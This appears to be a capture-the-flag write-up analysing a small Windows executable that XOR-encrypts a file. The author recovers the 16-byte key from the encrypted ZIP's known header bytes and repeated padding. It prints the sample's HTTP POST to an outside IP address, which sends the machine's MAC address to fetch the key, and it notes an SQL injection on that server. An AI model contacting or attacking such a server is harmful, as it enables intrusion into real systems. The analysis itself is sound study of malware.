It's x86 PE Executable, and it encrypts some file via 16byte XOR key from http://52.175.154.186/7SZ6DA2W3K/ZVD6E5W329A.php, like:
POST /7SZ6DA2W3K/ZVD6E5W329A.php?mac=98989898 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Host: 52.175.154.186
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
mac=<MAC Address>
User-Agent and POST data is additionally set. There is writeup file(!) in given zip file, and it says there are SQL injection vulnerability on this server.
However, the encrypted ZIP file itself reveals the XOR key itself. Let's see.
$ xxd flag.zip_enc
00000000: 273b 795d 5c64 6e33 5275 b609 f07c 1839 ';y]\dn3Ru...|.9
00000010: 63a1 6659 5664 7233 5275 4361 6835 0a18 c.fYVdr3RuCah5..
00000020: 1617 542d 2e10 3a00 6344 142c 5b6a 383c ..T-..:.cD.,[j8<
00000030: 4324 2500 6631 2a6c 1046 142c 316a 2e40 C$%.f1*l.F.,1j.@
00000040: 3529 2a12 5766 5133 5875 4b61 6835 911c 5)*.WfQ3XuKah5..
00000050: ef39 0e14 42b5 7233 5275 5761 6835 6474 .9..B.r3RuWah5dt
00000060: 5370 7a59 5664 6e33 7275 4b61 6835 6c74 SpzYVdn3ruKah5lt
00000070: 111c 1b3e 7810 1647 5875 6b61 6835 6c74 ...>x..GXukah5lt
00000080: 7670 6259 2e46 e47d c928 9960 edc3 380b vpbY.F.}.(.`..8.
00000090: 752a a858 d392 3a4c 502f 9960 387e 6972 u*.X..:LP/.`8~ir
000000a0: 7770 7a59 5764 6f33 0875 4b61 2a35 6c74 wpzYWdo3.uKa*5lt
000000b0: 7770 wp
ZIP has fixed header magic, PK, and usually it starts with data header (PK\x03\x04).
Additionally, ZIP file has many NULL bytes on header, like size field, etc. And there are repeated strings like:
wpzYWdo3RuWah5dt
I could adjust the key and obtain the valid zip file.